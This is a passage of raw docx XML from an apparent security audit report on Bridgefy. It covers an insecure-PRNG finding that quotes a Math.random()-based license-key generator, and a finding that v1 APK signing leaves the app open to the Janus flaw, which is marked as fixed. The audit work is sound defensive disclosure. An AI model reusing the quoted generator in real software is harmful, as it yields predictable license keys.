            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://jiang-zhenghong.github.io/blogs/PaddingOracle.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="580" w:lineRule="atLeast"/>
        <w:ind w:right="4802"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PRNG Affected File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/src/core/v1/usecases/uc-license.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_generateNewLicense(): string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1001" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.replace(/[xy]/g, (c) =&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1298" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>random = (Math.random() * 16) | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1440" w:right="2367" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'x'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x8; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value.toString(16);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1001" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to use a secure PRNG function, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>crypto.getRandomValues()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> for generating random numbers. The PRNG will then be sufficiently safeguarded against cryptographic attacks, while ensuring all functionality remains backwards compatible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250028" w:id="27"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:position w:val="-7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>signed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APK signature</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>v1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>signature makes the app prone to the known Janus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> vulnerability on devices running Android &lt; 7. The problem lets attackers smuggle malicious code into the APK without breaking the signature. At the time of writing, the app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>supports a minimum SDK of 21 (Android 5), which also uses the v1 signature, hence being vulnerable to this attack. Furthermore, Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>devices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>longer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>receive updates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>issues,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
